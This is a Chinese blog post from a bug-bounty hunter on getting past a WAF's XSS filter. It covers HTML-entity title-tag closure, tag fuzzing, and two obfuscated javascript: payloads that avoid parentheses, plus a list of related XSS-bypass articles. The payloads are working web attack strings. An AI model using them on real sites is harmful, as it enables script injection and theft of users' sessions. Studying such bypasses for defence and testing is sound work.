记一次XSS攻击绕过

最新推荐文章于 2024-05-13 12:10:52 发布
最新推荐文章于 2024-05-13 12:10:52 发布
阅读量420 收藏 2
点赞数 1
分类专栏: xss 文章标签: xss javascript 前端

前言

最近一直在看国外的赏金平台,绕waf是真的难受, 记录一下绕过的场景。

初步测试

一开始尝试XSS,发现用户的输入在title中展示,那么一般来说就是看能否闭合,我们从下面图中可以看到,输入尖括号后被转成了实体。

Untitled

绕过html实体编码

解释一下什么是html实体编码

HTML实体编码,也即HTML中的转义字符。

在 HTML 中,某些字符是预留的,例如在 HTML 中不能使用小于号<和大于号>,这是因为浏览器会误认为它们是标签。 如果希望正确地显示预留字符,我们必须在HTML源代码中使用字符实体(character entities)。 HTML 中的常用字符实体是不间断空格。(注意:实体名称对大小写敏感!) 字符实体类似这样:&entity_name; 或者 &#entity_number;如需显示小于号,我们必须这样写:< 或 < 常见的实体编码:

未标题-1.png

继续尝试是发现我们讲html10进制实体编号输入转义会闭合title标签

Untitled

原本以为事情逐渐简单了起来,结果更大的一个坑在等着我。

WAF层面

原本想着<img/src=1 οnerrοr=alert(1) />直接秒杀 结果来了个waf 贼厉害。

Untitled

下一步按照往常一样 fuzz事件,结果全是403,这时候那没办法了那就不能用img标签了

Untitled

改换其他标签,fuzz以下 发现可用的还不少。

Untitled

然后使用a标签进行绕过

常用的payload,基于下面payload改就行了

<a href="javascript:alert(1)"/>

原本是一番风顺的 到后面发先还有过滤,真吐了,看图就好

Untitled

Untitled

Untitled

绕过javascript,到这里了可能一部分人觉得已经结束了,但实际上没那么简单

Untitled

前面其实花的时间并不多主要绕alert的时候,此处我尝试的多种方式包括html实体绕过,基本都不行。

Untitled

Untitled

然后就在此处卡了很久,我也想过不使用alert使用prompt这些函数但就是不行,后面发现后面就是不能跟括号和反引号

Untitled

这时候就在想,还有不能用括号进行弹窗的函数?给我整懵逼了,找了一大圈一个都没找到都需要用括号,alert后不需要括号和反引号的也过不了。

Untitled

最后在推特上看到了这个最终完成绕过

aurebesh.js

Untitled

本地测试payload

<a/href="javascript;{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
<a href=ja&NewLine;vascript:k='',a=!k+k,f=!a+k,g=k+{},kk=a[k++],ka=a[kf=k],kg=++kf+k,ak=g[kf+kg],a[ak+=g[k]+(a.f+g)[k]+f[kg]+kk+ka+a[kf]+ak+kk+g[k]+ka][ak](f[k]+f[kf]+a[kg]+ka+kk+"(k)")()> 1111";//</title>

最终效果

Untitled

Untitled

本文作者:蚁景科技, 转载请注明来自FreeBuf.COM

 点击下方链接可免费获得渗透工具,应急响应笔记,学习路线技术文档、书籍,面试题,视频基础到进阶,环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等+V【zkaq222】或者下面的扫码不然通不过哦,免费领取安全学习资料包!(私聊进群一起学习,共同进步)腾讯文档-在线文档icon-default.png?t=N7T8https://docs.qq.com/doc/DYmVETWlZemh0Ymdv

渗透测试老鸟-九青
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss绕过尖括号和双括号_一次有意思的XSS过滤绕过2
weixin_36211712的博客
12-23 2278
前几天在漏洞挖掘中遇到个xss,感觉绕过过程蛮有意思的,写篇文章录下。接下里是我对这个xss详细的分析和绕过存在问题站点http://******/index/appInfo?appId=784&url=xss当我查看源代码搜索xss:一处输出点:继续搜索第二处输出点:两次输出,第一次输出是在input标签中,第二次是在js中,这里不考虑input中利用了。因为input的type为hi...
xss绕过尖括号和双括号_看我如何 Bypass WAF 弹 XSS
weixin_32955455的博客
12-27 1654
点击蓝字关注我们声明本文作者:Keac本文字数:1600阅读时长:15分钟附件/链接:点击查看原文下载声明:请勿用作违法用途,否则后果自负本文属于WgpSec原创奖励计划,未经许可禁止转载前言Xss bypass waf 并且构造函数 使危害更大,一般我们找到一个在js里面的可控点往往不能使危害更大,比如打开页面就执行一、开始正在干活,同事发来一条消息XSS?搞起随手试了下,发现网站存在...
【网络安全 前端XSS防护】一文带你了解HTML的特殊字符转义及编码_xss特殊字符替换
最新发布
2401_84970385的博客
05-13 1071
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
【渗透实例】一次XSS渗透过程
TeamsSix 的 CSDN 空间
07-03 2360
0x01 找到存在XSS的位置 没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。 [外链图片转存失败(img-qUL3DxC1-1562166261579)(https://mp.csdn.net/mdeditor/1)] 0x02 构造XSS代码连接到XSS平台 XSS平台给我们的XSS代码是这样的: </tExt...
一次xss挑战
weixin_33862514的博客
01-22 126
2019独角兽企业重金招聘Python工程师标准>>> ...
xss尖括号等被转义情况下的绕过测试
z1moq的博客
07-25 1万+
打开靶场 目标网站存在反射型xss漏洞,我们使用常用的方法进行测试 发现并无作用,打开网站源码查看问题情况 确实后端会将用户输入的数据无过滤直接返回前端,但是存在个别符号被转义的问题,导致无法正常弹窗 通过查找资料可知,可以通过使用三重url编码的方式绕过这一问题 尝试使用此方法进行绕过 emmmmmmm发现并不行 尝试使用编码绕过 发现也被转义了 既然无法实现转义绕过,就再次仔细观察前端页面代码 发现在form表单中也会直接显示,并且发现 value 的值是由单引号闭合,且单引号在前几次测
xss 绕过尖括号_XSS触发语句备忘
weixin_31205797的博客
01-18 808
一、标准语句二、尝试大小写三、使用标签1、windows事件//图片加载错误时触发2、鼠标事件//鼠标指针移动到元素时触发//鼠标指针移出时触发四、使用标签1、使用href属性qqtestaaaaaaa五、使用标签//用户按下按键时触发//用户按下按键时触发//用户松开按键时触发六、使用标签七、 使用八、 使用标签九、 使用标签//加载时触发十、 使用标签text//元素上点击鼠标时触发...
xss绕过尖括号和双括号_从Cookie中的Self-XSS到高危XSS
weixin_42290401的博客
12-16 268
上个月我到Synack的私有漏洞悬赏平台进行挖洞,发现在他们的一个网页中存在反射型XSS漏洞。由于Synack漏洞悬赏计划的私密性,我不会在这篇文章中提到测试目标,但是我将说明我是如何克服所遇到的许多不同的限制,最终挖到一个高危漏洞的。最初我的发现的XSS漏洞得到了272美元奖励,因为我无法证明我能访问文档对象模型,也就是DOM。而无法访问DOM的原因是括号字符被过滤,因此无法执行有效的paylo...
xss绕过字符过滤_Xss小游戏通关秘籍
weixin_39758712的博客
12-01 496
原创: Kale 合天智汇原创投稿活动:https://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ题最近发现一个xss的攻防网站,界面很有意思,很适合寓教于乐。于是玩了一下午,特此录下来!xss姿势众多,所以每关也只是给了一部分示例!知识前导什么是XSSXSS 或者说跨站脚本是一种 We...
xss绕过尖括号和双括号_xss防御及绕过-小1
weixin_29315091的博客
12-23 2979
XSS搞安全的应该都很熟悉。本次并不是说其原理,仅是分享下在测试过程中遇到的案例。本人小白一枚,所以案例大佬们看着可能非常简单,就当是录下自己笔吧,不喜勿喷哈。。关于xss的防御,基本上都是采用输入过滤,输出编码。最近做的一个项目中的某个模块中,进行了输入过滤,采用跳转的形式。比如遇到<>或alert,响应包就会302跳转到固定网址。遇到这种黑名单的可以尝试各种绕过。有些输入是在i...
【应用安全——XSS】过滤圆括号、尖括号绕过
热门推荐
Fly_鹏程万里
02-22 4万+
先看下程序大概写法: &lt;?php header("X-XSS-Protection:0"); $out = $_GET['code']; $out = str_replace("&lt;","&amp;lt;",$out); $out = str_replace("&gt;","&amp;gt;",$out); $out = str_replace(&quot
xss绕过尖括号和双括号_强防御下的XSS绕过思路(一)白名单篇
weixin_39532754的博客
12-27 5372
前 言很多白帽子在挖掘XSS漏洞的时候,往往会遇到一个问题,就是明明发现这里的过滤有缺陷,但是就是没法成功的进行构造利用。可能会由于自身对XSS绕过的局限性思维,往往只会反复的去尝试各种不同 payload代码,寄希望于其中某一个可以绕过过滤。但是在遇到强有力的XSS防御措施下,往往只能是竹篮打水一场空。鉴于这种情况,这里主要分3个章节来简单的分享一些XSS绕过思路。【第一节】 白名单限...
我的渗透笔XSS绕过技巧
xf555er的博客
03-03 1万+
1、单引号、双引号和尖括号之间的闭合。 有些标签例如,构造的payload应该为” >,那么组成的标签为<input value=""><script>alert(1)</script>" 2、尖括号转义,利用注释符号和一些属性事件. 例如,构造payload为" οnclick=alert(1)//,组成的标签为<input value="" o...
XSS绕过
m0_59855041的博客
09-04 196
alert(1)
xss绕过尖括号和双括号_XSS绕过<>进行测试
weixin_42406749的博客
01-30 5113
大家都知道,普遍的防御XSS攻击的方法是在后台对以下字符进行转义:、’、”,但是经过本人的研究发现,在一些特殊场景下,即使对以上字符进行了转义,还是可以执行XSS攻击的。首先看一个JS的例子:Default1234vars="u003cu003e";alert(s);运行这段代码,结果显示如下:看到这么熟悉的尖括号,大家会不会有一些兴奋的感觉呢?JS代码中并没有出现尖括号,可是运行时却输出了尖括号...
XSS绕过方式
OKAY_TC的博客
04-16 2945
录挖洞过程中所遇到的XSS绕过 1. 过滤了<>尖括号: //原理:利用html以及js伪协议,当用户打开页面缓冲页面会自动获取焦点,从而触发js代码生成script标签,达到目的。 autofocus onfocus=location="javasCript:s=document.createElement("script");s.src="http://<ip>...
xss绕过尖括号和双括号_XSS过关wp(未完待续,目前13)
weixin_42309456的博客
12-16 645
1.LEVEL 1审计源码:注意这几行:<?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; ?> GET方式传送一个参数name ,然后直接拼接echo所以给name直接传个最简单的xss弹窗即可:2.LEVEL...
xss绕过尖括号和双括号_XSS绕过filter高级技术part1
weixin_29903043的博客
12-23 1361
在如今的web时代,XSS攻击十分常见,针对xss攻击的防御也有不少,Filter就是一种用来防御xss攻击的最常见的手段,filter通常是采用黑名单的形式或者基于正则表达式来过滤。尽管如此,依然有很多技术可以用来绕过Filter。基本变形我们可以先从绕过相对简单的filter开始。根据Filter过滤规则复杂度的不同,绕过的难易程度肯定也不同,这些简单的过滤器还是比较容易绕过的,只要做一些基本...
xss绕过
Miracle_ze的博客
07-29 708
xss绕过
xss 常见绕过方式
07-27
常见的XSS绕过方式有以下几种: 1. 过滤绕过:攻击者可以尝试绕过过滤器,通过使用不同的编码、大小写变换、特殊字符等方式来绕过输入过滤。例如,可以使用URL编码、Unicode编码、HTML实体编码等来绕过过滤器的检测。 2. 标签绕过:攻击者可以尝试绕过过滤器对特定标签的限制。例如,可以使用不常见的标签、嵌套标签、属性绕过等方式来绕过过滤器的检测。 3. 事件绑定:攻击者可以通过在HTML标签中绑定JavaScript事件来执行恶意代码。例如,可以使用onmouseover、onclick等事件来触发XSS攻击。 4. 协议绕过:攻击者可以尝试绕过过滤器对协议的限制。例如,可以使用data URI、javascript URI等协议来执行恶意代码。 5. 混淆绕过:攻击者可以使用各种混淆技术来隐藏恶意代码,使其难以被过滤器检测到。例如,可以使用字符编码、换行、空格等方式来混淆代码。 需要注意的是,XSS攻击绕过方式是不断变化的,攻击者会不断寻找新的绕过方法。因此,对于XSS防护来说,及时更新和强化防护措施是非常重要的。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [XSS常见的绕过手法](https://blog.csdn.net/Redredredfish/article/details/121748503)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [XSS攻击绕过过滤方法大全(转)](https://blog.csdn.net/qq_50854790/article/details/124297046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值